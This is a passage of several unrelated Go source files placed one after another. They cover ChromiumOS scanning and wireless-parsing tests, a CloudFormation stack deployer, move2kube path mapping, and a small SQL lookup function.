data, _ := ioutil.ReadFile(path)
t.Fatalf("%v; output:\n%s", err, string(data))
}
}
func saveFormat(t *testing.T, format Format, expectedOutput, expectedFileName string) {
// Note: format=Chromeperf does not currently support multiple variants.
var (
metric1 = Metric{Name: "metric1", Unit: "unit1", Direction: SmallerIsBetter}
metric2 = Metric{Name: "metric2", Unit: "unit2", Direction: SmallerIsBetter, Multiple: true}
metric3 = Metric{Name: "metric3", Unit: "bytes", Direction: BiggerIsBetter}
)
p := NewValues()
p.Set(metric1, 100)
p.Set(metric2, 200, 201, 202)
p.Set(metric3, 300)
saveAsAndCompare(t, p, expectedOutput, format, expectedFileName)
}
func TestSaveAsCrosbolt(t *testing.T) {
saveFormat(t, Crosbolt, "testdata/TestSaveAsCrosbolt.json", "results-chart.json")
}
func TestSaveAsChromeperf(t *testing.T) {
saveFormat(t, Chromeperf, "testdata/TestSaveAsChromeperf.json", "perf_results.json")
}
|
// Copyright 2021 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package scanapp
import (
"context"
"chromiumos/tast/local/bundles/cros/scanapp/scanning"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/chrome/uiauto/scanapp"
"chromiumos/tast/testing"
)
func init() {
testing.AddTest(&testing.Test{
Func: LargePaperScans,
LacrosStatus: testing.LacrosVariantUnneeded,
Desc: "Tests that the Scan app supports large paper size selection when available from printer",
Contacts: []string{"bmgordon@chromium.org", "project-bolton@google.com", "cros-peripherals@google.com"},
Attr: []string{
"group:mainline",
"informational",
"group:paper-io",
"paper-io_scanning",
},
SoftwareDeps: []string{"virtual_usb_printer", "cups", "chrome"},
Fixture: "virtualUsbPrinterModulesLoadedWithChromeLoggedIn",
Data: []string{
scanning.SourceImage,
a3GoldenFile,
a4GoldenFile,
b4GoldenFile,
legalGoldenFile,
letterGoldenFile,
tabloidGoldenFile,
},
})
}
const (
esclCapabilities = "/usr/local/etc/virtual-usb-printer/escl_capabilities_large_paper_sizes.json"
a3GoldenFile = "a3_golden_file.png"
a4GoldenFile = "a4_golden_file.png"
b4GoldenFile = "b4_golden_file.png"
legalGoldenFile = "legal_golden_file.png"
letterGoldenFile = "letter_golden_file.png"
tabloidGoldenFile = "tabloid_golden_file.png"
)
var testSetups = []scanning.TestingStruct{
{
Name: "paper_size_a3",
Settings: scanapp.ScanSettings{
Source: scanapp.SourceFlatbed,
FileType: scanapp.FileTypePNG,
ColorMode: scanapp.ColorModeColor,
PageSize: scanapp.PageSizeA3,
Resolution: scanapp.Resolution300DPI,
},
GoldenFile: a3GoldenFile,
}, {
Name: "paper_size_a4",
Settings: scanapp.ScanSettings{
Source: scanapp.SourceFlatbed,
FileType: scanapp.FileTypePNG,
ColorMode: scanapp.ColorModeColor,
PageSize: scanapp.PageSizeA4,
Resolution: scanapp.Resolution300DPI,
},
GoldenFile: a4GoldenFile,
}, {
Name: "paper_size_b4",
Settings: scanapp.ScanSettings{
Source: scanapp.SourceFlatbed,
FileType: scanapp.FileTypePNG,
ColorMode: scanapp.ColorModeColor,
PageSize: scanapp.PageSizeB4,
Resolution: scanapp.Resolution300DPI,
},
GoldenFile: b4GoldenFile,
}, {
Name: "paper_size_legal",
Settings: scanapp.ScanSettings{
Source: scanapp.SourceFlatbed,
FileType: scanapp.FileTypePNG,
ColorMode: scanapp.ColorModeColor,
PageSize: scanapp.PageSizeLegal,
Resolution: scanapp.Resolution300DPI,
},
GoldenFile: legalGoldenFile,
}, {
Name: "paper_size_letter",
Settings: scanapp.ScanSettings{
Source: scanapp.SourceFlatbed,
FileType: scanapp.FileTypePNG,
ColorMode: scanapp.ColorModeColor,
PageSize: scanapp.PageSizeLetter,
Resolution: scanapp.Resolution300DPI,
},
GoldenFile: letterGoldenFile,
}, {
Name: "paper_size_tabloid",
Settings: scanapp.ScanSettings{
Source: scanapp.SourceFlatbed,
FileType: scanapp.FileTypePNG,
ColorMode: scanapp.ColorModeColor,
PageSize: scanapp.PageSizeTabloid,
Resolution: scanapp.Resolution300DPI,
},
GoldenFile: tabloidGoldenFile,
},
}
func LargePaperScans(ctx context.Context, s *testing.State) {
cr := s.FixtValue().(*chrome.Chrome)
var scannerParams = scanning.ScannerStruct{
Descriptors: scanning.Descriptors,
Attributes: scanning.Attributes,
EsclCaps: esclCapabilities,
}
scanning.RunAppSettingsTests(ctx, s, cr, testSetups, scannerParams)
}
|
package stack
import (
"encoding/json"
"fmt"
"github.com/CleverTap/cfstack/internal/pkg/aws/cloudformation"
"github.com/CleverTap/cfstack/internal/pkg/aws/s3"
"github.com/CleverTap/cfstack/internal/pkg/templates"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/fatih/color"
"github.com/golang/glog"
"os"
"path/filepath"
"strings"
)
const (
DiffSuccessStatus = "success"
DiffFailStatus = "failed"
DiffUnknownStatus = "unknown"
)
type Stack struct {
StackName string `validate:"required",json:"StackName"`
TemplatePath string `validate:"required",json:"TemplatePath"`
TemplateRootPath string `json:"TemplateRootPath"`
AbsTemplatePath string `json:"AbsTemplatePath"`
TemplateUrl string `json:"TemplateUrl"`
Action string `validate:"required",json:"Action"`
StackPolicy templates.PolicyDocument `validate:"required",json:"StackPolicy"`
Region string `json:"Region"`
UID string `json:"UID,omitempty"`
Bucket string `json:"Bucket,omitempty"`
Parameters map[string]string `validate:"required",json:"Parameters"`
DeploymentOrder int `json:"DeploymentOrder"`
Changes *cloudformation.Changes
SuppressMessages bool
serverless bool
RoleArn string
Deployer cloudformation.CloudFormation
Uploader s3.S3
}
func (s *Stack) SetRegion(region string) {
s.Region = region
}
func (s *Stack) SetDeploymentOrder(i int) {
s.DeploymentOrder = i
}
func (s *Stack) SetBucket(bucket string) {
s.Bucket = bucket
}
func (s *Stack) SetUuid(uuid string) {
s.UID = uuid
}
func (s *Stack) getChangeSetName() string {
return fmt.Sprintf("changeset-%s-%s", s.UID, s.StackName)
}
func (s *Stack) Deploy() error {
if len(s.TemplateUrl) == 0 {
err := s.uploadTemplate()
if err != nil {
return err
}
}
err := s.Deployer.ValidateTemplate(s.TemplateUrl)
if err != nil {
return err
}
stackExists, err := s.Deployer.StackExists(s.StackName)
if err != nil {
return err
}
if s.Action == "DELETE" {
if stackExists {
err = s.delete()
if err != nil {
return err
}
}
fmt.Printf("There is no stack %s in region %s to delete\n", s.StackName, s.Region)
} else {
if stackExists {
err = s.update()
if err != nil {
return err
}
} else {
err = s.create()
if err != nil {
return err
}
}
}
return nil
}
func (s *Stack) Diff() error {
if len(s.TemplateUrl) == 0 {
err := s.uploadTemplate()
if err != nil {
return err
}
}
err := s.Deployer.ValidateTemplate(s.TemplateUrl)
if err != nil {
glog.Warningf("Template validation error for stack %s", s.StackName)
return err
}
var changeSetType string
stackExists, err := s.Deployer.StackExists(s.StackName)
if err != nil {
return err
}
if stackExists {
changeSetType = "UPDATE"
} else {
changeSetType = "CREATE"
}
stackPolicy, err := json.Marshal(s.StackPolicy)
if err != nil {
return err
}
getStackChangesOpts := cloudformation.GetStackChangesOpts{
StackName: s.StackName,
TemplateUrl: s.TemplateUrl,
StackPolicy: string(stackPolicy),
Parameters: s.Parameters,
ChangeSetName: s.getChangeSetName(),
Type: changeSetType,
RoleArn: s.RoleArn,
}
changes, err := s.Deployer.GetStackChanges(&getStackChangesOpts)
if err != nil {
return err
}
s.Changes = changes
return nil
}
func (s *Stack) Delete() error {
stackExists, err := s.Deployer.StackExists(s.StackName)
if err != nil {
return err
}
if stackExists {
return s.delete()
}
color.New(color.FgYellow).Fprintf(os.Stdout, " Stack %s does not exist in region %s\n", s.StackName, s.Region)
return nil
}
func (s *Stack) create() error {
if !s.SuppressMessages {
fmt.Printf(" Stack doesn't exist, creating a new one\n")
}
stackPolicy, err := json.Marshal(s.StackPolicy)
if err != nil {
return err
}
err = s.Deployer.CreateNewStack(&cloudformation.CreateStackOpts{
StackName: s.StackName,
TemplateUrl: s.TemplateUrl,
Parameters: s.Parameters,
StackPolicy: string(stackPolicy),
Serverless: s.serverless,
RoleArn: s.RoleArn,
})
if err != nil {
return err
}
if !s.SuppressMessages {
color.New(color.FgGreen).Fprintf(os.Stdout, " Stack create complete\n")
}
return nil
}
func (s *Stack) update() error {
if !s.SuppressMessages {
fmt.Printf(" Stack exists, will check for updates\n")
}
stackPolicy, err := json.Marshal(s.StackPolicy)
if err != nil {
return err
}
changes, err := s.Deployer.GetStackChanges(&cloudformation.GetStackChangesOpts{
StackName: s.StackName,
TemplateUrl: s.TemplateUrl,
StackPolicy: string(stackPolicy),
Parameters: s.Parameters,
ChangeSetName: s.getChangeSetName(),
Type: "UPDATE",
RoleArn: s.RoleArn,
})
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case "ValidationError":
if strings.Contains(aerr.Message(), "IN_PROGRESS") {
color.New(color.FgYellow).Fprintf(os.Stdout, " %s\n", aerr.Message())
return nil
} else {
return fmt.Errorf("Unhandled AWS ValidationError for stack %s\n%s", s.StackName, aerr.Message())
}
default:
return fmt.Errorf("Unhandled AWS error for stack %s\n%s", s.StackName, aerr.Message())
}
}
return err
}
if changes.StackPolicyChange == true && string(stackPolicy) != "{}" {
if !s.SuppressMessages {
fmt.Printf(" Changes in %s stack policy detected, it will be updated first\n", s.StackName)
}
err = s.Deployer.SetStackPolicy(s.StackName, string(stackPolicy))
if err != nil {
return err
}
if !s.SuppressMessages {
color.New(color.FgGreen).Fprintf(os.Stdout, " Stack upolicy updated\n")
}
}
if len(changes.Resources) == 0 && changes.ForceStackUpdate == false {
if !s.SuppressMessages {
color.New(color.FgYellow).Fprintf(os.Stdout, " No resource changes detected for stack, skipping update..\n")
}
return nil
}
if !s.SuppressMessages {
fmt.Printf(" Changes in %s resources detected, waiting for update to finish\n", s.StackName)
}
err = s.Deployer.UpdateExistingStack(&cloudformation.CreateStackOpts{
StackName: s.StackName,
TemplateUrl: s.TemplateUrl,
Parameters: s.Parameters,
StackPolicy: string(stackPolicy),
Serverless: s.serverless,
RoleArn: s.RoleArn,
})
if err != nil {
return err
}
if !s.SuppressMessages {
color.New(color.FgGreen).Fprintf(os.Stdout, " Stack update complete\n")
}
return nil
}
func (s *Stack) delete() error {
err := s.Deployer.DeleteStack(&cloudformation.DeleteStackOpts{
StackName: s.StackName,
RoleArn: s.RoleArn,
})
if err != nil {
return err
}
color.New(color.FgGreen).Fprintf(os.Stdout, " Stack delete complete\n")
return nil
}
func (s *Stack) uploadTemplate() error {
s.AbsTemplatePath = s.TemplatePath
s.TemplateUrl = "https://s3-" + s.Region + ".amazonaws.com/" + s.Bucket + "/" + s.UID + s.TemplatePath
if !filepath.IsAbs(s.TemplatePath) {
s.AbsTemplatePath = filepath.Join(s.TemplateRootPath, s.TemplatePath)
s.TemplateUrl = "https://s3-" + s.Region + ".amazonaws.com/" + s.Bucket + "/" + s.UID + "/" + s.TemplatePath
}
if s.Region == "us-east-1" {
s.TemplateUrl = strings.Replace(s.TemplateUrl, "https://s3-", "https://s3.", -1)
}
isServerLessStack, err := templates.IsServerlessTemplate(s.AbsTemplatePath)
if err != nil {
return err
}
if isServerLessStack {
s.serverless = true
fmt.Printf(" Packing serverless stack %s\n", s.StackName)
err = s.packageServerlessTemplate()
if err != nil {
return err
}
}
uploaderOpts := s3.Opts{
Bucket: s.Bucket,
Filepath: s.AbsTemplatePath,
Key: s.UID + "/" + s.TemplatePath,
}
err = s.Uploader.UploadToS3(&uploaderOpts)
if err != nil {
glog.Errorf("template upload for stack %s failed", s.StackName)
return err
}
//if isServerLessStack {
// err = os.Remove(s.AbsTemplatePath)
// if err != nil {
// return err
// }
//}
return nil
}
|
/*
* Copyright IBM Corporation 2021
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package transformer
import (
"path/filepath"
"strings"
"github.com/konveyor/move2kube/filesystem"
transformertypes "github.com/konveyor/move2kube/types/transformer"
"github.com/sirupsen/logrus"
)
type pair struct {
A string
B string
}
func getpair(a, b string) pair {
return pair{A: a, B: b}
}
func processPathMappings(pms []transformertypes.PathMapping, sourcePath, outputPath string) error {
copiedSourceDests := map[pair]bool{}
for _, pm := range pms {
if !strings.EqualFold(pm.Type, transformertypes.SourcePathMappingType) || copiedSourceDests[getpair(pm.SrcPath, pm.DestPath)] {
continue
}
srcPath := pm.SrcPath
if !filepath.IsAbs(pm.SrcPath) {
srcPath = filepath.Join(sourcePath, pm.SrcPath)
}
destPath := filepath.Join(outputPath, pm.DestPath)
if err := filesystem.Merge(srcPath, destPath, true); err != nil {
logrus.Errorf("Error while copying sourcepath for %+v . Error: %q", pm, err)
}
copiedSourceDests[getpair(pm.SrcPath, pm.DestPath)] = true
}
copiedDefaultDests := map[pair]bool{}
for _, pm := range pms {
destPath := filepath.Join(outputPath, pm.DestPath)
switch strings.ToLower(pm.Type) {
case strings.ToLower(transformertypes.SourcePathMappingType): // skip sources
case strings.ToLower(transformertypes.ModifiedSourcePathMappingType):
if err := filesystem.Merge(pm.SrcPath, destPath, false); err != nil {
logrus.Errorf("Error while copying sourcepath for %+v", pm)
}
case strings.ToLower(transformertypes.TemplatePathMappingType):
if err := filesystem.TemplateCopy(pm.SrcPath, destPath, pm.TemplateConfig); err != nil {
logrus.Errorf("Error while copying sourcepath for %+v", pm)
}
default:
if !copiedDefaultDests[getpair(pm.SrcPath, pm.DestPath)] {
if err := filesystem.Merge(pm.SrcPath, destPath, true); err != nil {
logrus.Errorf("Error while copying sourcepath for %+v", pm)
}
copiedDefaultDests[getpair(pm.SrcPath, pm.DestPath)] = true
}
}
}
return nil
}
|
package DbService
import (
"fmt"
"ledger/DbDao"
)
//type workList struct {
// WorkId string
// WorkName string
// PutTime string
//}
func QueryWorkList(username string) []map[string]string {
// QueryResult, _ := DbDao.QueryForMapSlice("select * from tb_Work where owner=? ", owner)
QueryResult, _ := DbDao.QueryForMapSlice("SELECT WorkID,workname,time FROM tb_Work , tb_User where tb_Work.owner = tb_User.userID and tb_User.username = ?", username)
for k, _ := range QueryResult {
fmt.Println(QueryResult[k]["WorkID"])
fmt.Println(QueryResult[k]["workname"])
fmt.Println(QueryResult[k]["time"])
}
return QueryResult
}
|
// Copyright 2019 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Package iw contains utility functions to wrap around the iw program.
package iw
import (
"context"
"io"
"os"
"reflect"
"testing"
"github.com/google/go-cmp/cmp"
)
// stubCmdRunner is a simple stub of CmdRunner which always returns the given content
// as command output. This is useful for testing some simple parsing that is not
// extracted as an independent function.
type stubCmdRunner struct {
out []byte
}
// Run is a noop mock which always returns nil.
func (r *stubCmdRunner) Run(ctx context.Context, cmd string, args ...string) error {
return nil
}
// Output is a mock which pretends the command is executed successfully and prints
// the pre-assigned output.
func (r *stubCmdRunner) Output(ctx context.Context, cmd string, args ...string) ([]byte, error) {
return r.out, nil
}
// CreateCmd is a mock function which does nothing.
func (r *stubCmdRunner) CreateCmd(ctx context.Context, cmd string, args ...string) {
return
}
// SetStdOut is a mock function which does nothing.
func (r *stubCmdRunner) SetStdOut(stdoutFile *os.File) {
return
}
// StderrPipe is a mock function which always returns nil.
func (r *stubCmdRunner) StderrPipe() (io.ReadCloser, error) {
return nil, nil
}
// StartCmd is a mock function which always returns nil.
func (r *stubCmdRunner) StartCmd() error {
return nil
}
// WaitCmd is a mock function which always returns nil.
func (r *stubCmdRunner) WaitCmd() error {
return nil
}
// CmdExists is a mock function which always returns false.
func (r *stubCmdRunner) CmdExists() bool {
return false
}
// ReleaseProcess is a mock function which always returns nil.
func (r *stubCmdRunner) ReleaseProcess() error {
return nil
}
// ResetCmd is a mock function which does nothing.
func (r *stubCmdRunner) ResetCmd() {
return
}
func TestAllLinkKeys(t *testing.T) {
const testStr = `Connected to 74:e5:43:10:4f:c0 (on wlan0)
SSID: PMKSACaching_4m9p5_ch1
freq: 5220
RX: 5370 bytes (37 packets)
TX: 3604 bytes (15 packets)
signal: -59 dBm
tx bitrate: 13.0 MBit/s MCS 1
bss flags: short-slot-time
dtim period: 5
beacon int: 100`
cmpMap := map[string]string{
"SSID": "PMKSACaching_4m9p5_ch1",
"freq": "5220",
"TX": "3604 bytes (15 packets)",
"signal": "-59 dBm",
"bss flags": "short-slot-time",
"dtim period": "5",
"beacon int": "100",
"RX": "5370 bytes (37 packets)",
"tx bitrate": "13.0 MBit/s MCS 1",
}
l := allLinkKeys(testStr)
if !reflect.DeepEqual(l, cmpMap) {
t.Errorf("unexpected result in allLinkKeys: got %v, want %v", l, cmpMap)
}
}
func TestParseScanResults(t *testing.T) {
const testStr = `BSS 00:11:22:33:44:55(on wlan0)
freq: 2447
beacon interval: 100 TUs
signal: -46.00 dBm
Information elements from Probe Response frame:
SSID: my_wpa2_network
Extended supported rates: 24.0 36.0 48.0 54.0
HT capabilities:
Capabilities: 0x0c
HT20
HT operation:
* primary channel: 8
* secondary channel offset: no secondary
* STA channel width: 20 MHz
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
`
l, err := parseScanResults(testStr)
if err != nil {
t.Fatal("parseScanResults failed: ", err)
}
cmpBSS := []*BSSData{
{
BSS: "00:11:22:33:44:55",
Frequency: 2447,
SSID: "my_wpa2_network",
Security: "RSN",
HT: "HT20",
Signal: -46,
},
}
if !reflect.DeepEqual(l, cmpBSS) {
t.Errorf("unexpected result in parseScanResults: got %v, want %v", l, cmpBSS)
}
}
func TestNewPhy(t *testing.T) {
testcases := []struct {
header string
section string
expect *Phy
}{
{
header: `Wiphy 3`,
section: ` max # scan SSIDs: 20
max scan IEs length: 425 bytes
max # sched scan SSIDs: 20
max # match sets: 11
Retry short limit: 7
Retry long limit: 4
Coverage class: 0 (up to 0m)
Device supports RSN-IBSS.
Device supports AP-side u-APSD.
Device supports T-DLS.
Supported Ciphers:
* WEP40 (00-0f-ac:1)
* WEP104 (00-0f-ac:5)
* TKIP (00-0f-ac:2)
* CCMP-128 (00-0f-ac:4)
* CMAC (00-0f-ac:6)
Available Antennas: TX 0 RX 0
Supported interface modes:
* IBSS
* managed
* monitor
Band 1:
Capabilities: 0x11ef
RX LDPC
HT20/HT40
SM Power Save disabled
RX HT20 SGI
RX HT40 SGI
TX STBC
RX STBC 1-stream
Max AMSDU length: 3839 bytes
DSSS/CCK HT40
Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
Minimum RX AMPDU time spacing: 4 usec (0x05)
HT Max RX data rate: 300 Mbps
HT TX/RX MCS rate indexes supported: 0-15
Bitrates (non-HT):
* 1.0 Mbps
Frequencies:
* 2412 MHz [1] (22.0 dBm)
Supported commands:
* connect
* disconnect
valid interface combinations:
* #{ managed } <= 2, #{ AP, P2P-client, P2P-GO } <= 2, #{ P2P-device } <= 1,
total <= 4, #channels <= 1
* #{ managed } <= 2, #{ P2P-client } <= 2, #{ AP, P2P-GO } <= 1, #{ P2P-device } <= 1,
total <= 4, #channels <= 2
* #{ managed } <= 1, #{ outside context of a BSS, mesh point, IBSS } <= 1,
total <= 2, #channels <= 1`,
expect: &Phy{
Name: "3",
Bands: []Band{
{
Num: 1,
FrequencyFlags: map[int][]string{
2412: nil,
},
MCSIndices: []int{
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
},
},
},
Modes: []string{
"IBSS",
"managed",
"monitor",
},
Commands: []string{
"connect",
"disconnect",
},
Features: []string{
"RSN-IBSS",
"AP-side u-APSD",
"T-DLS",
},
RxAntenna: 0,
TxAntenna: 0,
MaxScanSSIDs: 20,
SupportVHT: false,
SupportHT2040: true,
SupportHT20SGI: true,
SupportHT40SGI: true,
SupportVHT80SGI: false,
SupportMUMIMO: false,
IfaceCombinations: []IfaceCombination{
{
IfaceLimits: []IfaceLimit{
{
IfaceTypes: []IfType{
IfTypeManaged,
},
MaxCount: 2,
},
{
IfaceTypes: []IfType{
IfTypeAP,
IfTypeP2PClient,
IfTypeP2PGO,
},
MaxCount: 2,
},
{
IfaceTypes: []IfType{
IfTypeP2PDevice,
},
MaxCount: 1,
},
},
MaxTotal: 4,
MaxChannels: 1,
},
{
IfaceLimits: []IfaceLimit{
{
IfaceTypes: []IfType{
IfTypeManaged,
},
MaxCount: 2,
},
{
IfaceTypes: []IfType{
IfTypeP2PClient,
},
MaxCount: 2,
},
{
IfaceTypes: []IfType{
IfTypeAP,
IfTypeP2PGO,
},
MaxCount: 1,
},
{
IfaceTypes: []IfType{
IfTypeP2PDevice,
},
MaxCount: 1,
},
},
MaxTotal: 4,
MaxChannels: 2,
},
{
IfaceLimits: []IfaceLimit{
{
IfaceTypes: []IfType{
IfTypeManaged,
},
MaxCount: 1,
},
{
IfaceTypes: []IfType{
IfTypeOutsideContextOfBSS,
IfTypeMeshPoint,
IfTypeIBSS,
},
MaxCount: 1,
},
},
MaxTotal: 2,
MaxChannels: 1,
},
},
},
},
{
header: `Wiphy phy0`,
section: ` wiphy index: 0
max # scan SSIDs: 16
max scan IEs length: 195 bytes
max # sched scan SSIDs: 0
max # match sets: 0
max # scan plans: 1
max scan plan interval: -1
max scan plan iterations: 0
Retry short limit: 7
Retry long limit: 4
Coverage class: 0 (up to 0m)
Device supports RSN-IBSS.
Device supports AP-side u-APSD.
Supported Ciphers:
* WEP40 (00-0f-ac:1)
* WEP104 (00-0f-ac:5)
* TKIP (00-0f-ac:2)
* CCMP-128 (00-0f-ac:4)
* CMAC (00-0f-ac:6)
* CMAC-256 (00-0f-ac:13)
* GMAC-128 (00-0f-ac:11)
* GMAC-256 (00-0f-ac:12)
Available Antennas: TX 0x3 RX 0x3
Configured Antennas: TX 0x3 RX 0x3
Supported interface modes:
* managed
* AP
* monitor
Band 2:
Capabilities: 0x19ef
RX LDPC
HT20/HT40
SM Power Save disabled
RX HT20 SGI
RX HT40 SGI
TX STBC
RX STBC 1-stream
Max AMSDU length: 7935 bytes
DSSS/CCK HT40
Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
Minimum RX AMPDU time spacing: 8 usec (0x06)
HT TX/RX MCS rate indexes supported: 0-15
VHT Capabilities (0x339071b2):
Max MPDU length: 11454
Supported Channel Width: neither 160 nor 80+80
RX LDPC
short GI (80 MHz)
TX STBC
SU Beamformee
MU Beamformee
RX antenna pattern consistency
TX antenna pattern consistency
VHT RX MCS set:
1 streams: MCS 0-9
2 streams: MCS 0-9
3 streams: not supported
4 streams: not supported
5 streams: not supported
6 streams: not supported
7 streams: not supported
8 streams: not supported
VHT RX highest supported: 0 Mbps
VHT TX MCS set:
1 streams: MCS 0-9
2 streams: MCS 0-9
3 streams: not supported
4 streams: not supported
5 streams: not supported
6 streams: not supported
7 streams: not supported
8 streams: not supported
VHT TX highest supported: 0 Mbps
Bitrates (non-HT):
* 6.0 Mbps
* 9.0 Mbps
* 12.0 Mbps
* 18.0 Mbps
* 24.0 Mbps
* 36.0 Mbps
* 48.0 Mbps
* 54.0 Mbps
Frequencies:
* 5180 MHz [36] (23.0 dBm)
Supported commands:
* new_interface
* set_interface
`,
expect: &Phy{
Name: "phy0",
Bands: []Band{
{
Num: 2,
FrequencyFlags: map[int][]string{
5180: nil,
},
MCSIndices: []int{
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
},
},
},
Modes: []string{
"managed",
"AP",
"monitor",
},
Commands: []string{
"new_interface",
"set_interface",
},
Features: []string{
"RSN-IBSS",
"AP-side u-APSD",
},
RxAntenna: 3,
TxAntenna: 3,
MaxScanSSIDs: 16,
SupportVHT: true,
SupportHT2040: true,
SupportHT20SGI: true,
SupportHT40SGI: true,
SupportVHT80SGI: true,
SupportMUMIMO: true,
IfaceCombinations: []IfaceCombination(nil),
},
},
}
for i, tc := range testcases {
l, err := newPhy(tc.header, tc.section)
if err != nil {
t.Errorf("testcase #%d: newPhy failed: %v", i, err)
continue
}
if !reflect.DeepEqual(l, tc.expect) {
t.Errorf("testcase #%d: unexpected result in newPhy: got %v, want %v", i, l, tc.expect)
}
}
}
func TestParseHiddenScanResults(t *testing.T) {
const testStr = `BSS 00:11:22:33:44:55(on wlan0)
freq: 2412
beacon interval: 100 TUs
signal: -46.00 dBm
Information elements from Probe Response frame:
SSID:
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
Extended supported rates: 24.0 36.0 48.0 54.0
HT capabilities:
Capabilities: 0x0c
HT20
HT operation:
* primary channel: 8
* secondary channel offset: no secondary
* STA channel width: 20 MHz
`
l, err := parseScanResults(testStr)
if err != nil {
t.Fatal("parseScanResults failed: ", err)
}
cmpBSS := []*BSSData{
{
BSS: "00:11:22:33:44:55",
Frequency: 2412,
SSID: "",
Security: "open",
HT: "HT20",
Signal: -46,
},
}
if diff := cmp.Diff(l, cmpBSS); diff != "" {
t.Error("parseScanResults returned unexpected result; diff:\n", diff)
}
}
func TestParseBandMCSIndices(t *testing.T) {
// Partial data from elm DUT.
content := `
Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
Minimum RX AMPDU time spacing: No restriction (0x00)
HT TX/RX MCS rate indexes supported: 0-15, 32
`
expected := []int{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 32}
ret, err := parseBandMCSIndices(content)
if err != nil {
t.Fatal("parseBandMCSIndices failed: ", err)
}
if !reflect.DeepEqual(ret, expected) {
t.Errorf("unexpected result in parseBandMCSIndices: got %v, want %v", ret, expected)
}
}
func TestParseFrequencyFlags(t *testing.T) {
// Hand-crafted data to test different cases.
content := `
Frequencies:
* 5040 MHz [8] (disabled)
* 5190 MHz [38] (23.0 dBm)
* 5210 MHz [42] (23.0 dBm) (passive scan, radar detection)
`
expected := map[int][]string{
5040: {"disabled"},
5190: nil,
5210: {"passive scan", "radar detection"},
}
ret, err := parseFrequencyFlags(content)
if err != nil {
t.Fatal("parseFrequencyFlags failed: ", err)
}
if !reflect.DeepEqual(ret, expected) {
t.Errorf("unexpected result in parseFrequencyFlags: got %v, want %v", ret, expected)
}
}
func TestParseInterfaces(t *testing.T) {
for _, param := range []struct {
content string
expected []*NetDev
}{
{
content: `phy#1
Interface managed0
ifindex 142
wdev 0x100000080
addr 00:11:22:33:44:55
type managed
Interface monitor0
ifindex 141
wdev 0x10000007f
addr 00:11:22:33:44:55
type monitor
phy#0
Interface managed2
ifindex 139
wdev 0x9
addr 00:11:22:33:44:55
type managed
`,
expected: []*NetDev{
{
PhyNum: 1,
IfName: "managed0",
IfType: "managed",
},
{
PhyNum: 1,
IfName: "monitor0",
IfType: "monitor",
},
{
PhyNum: 0,
IfName: "managed2",
IfType: "managed",
},
},
},
{
content: `phy#0
Interface wlan0
ifindex 8
wdev 0x100000001
addr 50:00:00:00:00:01
type managed
channel 52 (5260 MHz), width: 40 MHz, center1: 5270 MHz
txpower 23.00 dBm
`,
expected: []*NetDev{
{
PhyNum: 0,
IfName: "wlan0",
IfType: "managed",
},
},
},
} {
devs, err := parseInterfaces(param.content)
if err != nil {
t.Fatal("parseInterfaces failed: ", err)
}
if !reflect.DeepEqual(devs, param.expected) {
t.Errorf("unexpected result in parseInterfaces: got %v, want %v", devs, param.expected)
}
}
}
func TestSetFreqOption(t *testing.T) {
testcases := []struct {
ctrlFreq int
ops []SetFreqOption
valid bool
args []string
}{
{
ctrlFreq: 2412,
ops: nil,
valid: true,
args: []string{"2412"},
},
{
ctrlFreq: 2412,
ops: []SetFreqOption{SetFreqChWidth(ChWidthHT20)},
valid: true,
args: []string{"2412", "HT20"},
},
{
ctrlFreq: 2412,
ops: []SetFreqOption{SetFreqChWidth(ChWidthHT40Plus)},
valid: true,
args: []string{"2412", "HT40+"},
},
{
ctrlFreq: 5240,
ops: []SetFreqOption{SetFreqChWidth(ChWidthHT40Minus)},
valid: true,
args: []string{"5240", "HT40-"},
},
{
ctrlFreq: 5180,
ops: []SetFreqOption{
SetFreqChWidth(ChWidthHT40Plus),
SetFreqCenterFreq1(5190),
},
valid: false,
},
{
ctrlFreq: 5240,
ops: []SetFreqOption{SetFreqChWidth(ChWidth80)},
valid: true,
args: []string{"5240", "80", "5210"},
},
{
ctrlFreq: 5240,
ops: []SetFreqOption{
SetFreqChWidth(ChWidth80),
SetFreqCenterFreq1(5210),
},
valid: true,
args: []string{"5240", "80", "5210"},
},
{
ctrlFreq: 5240,
ops: []SetFreqOption{SetFreqChWidth(ChWidth160)},
valid: true,
args: []string{"5240", "160", "5250"},
},
{
ctrlFreq: 5200,
ops: []SetFreqOption{
SetFreqChWidth(ChWidth160),
SetFreqCenterFreq1(5250),
},
valid: true,
args: []string{"5200", "160", "5250"},
},
{
ctrlFreq: 5240,
ops: []SetFreqOption{SetFreqChWidth(ChWidth80P80)},
valid: false,
},
{
ctrlFreq: 5200,
ops: []SetFreqOption{
SetFreqChWidth(ChWidth80P80),
SetFreqCenterFreq1(5210),
SetFreqCenterFreq2(5530),
},
valid: true,
args: []string{"5200", "80+80", "5210", "5530"},
},
}
for i, tc := range testcases {
conf, err := newSetFreqConf(tc.ctrlFreq, tc.ops...)
if !tc.valid {
if err == nil {
t.Errorf("testcase #%d should fail but succeed", i)
}
continue
} else if err != nil {
t.Errorf("testcase #%d failed with err=%s", i, err.Error())
} else if args := conf.toArgs(); !reflect.DeepEqual(args, tc.args) {
t.Errorf("testcase #%d failed, got args=%v, expect=%v", i, args, tc.args)
}
}
}
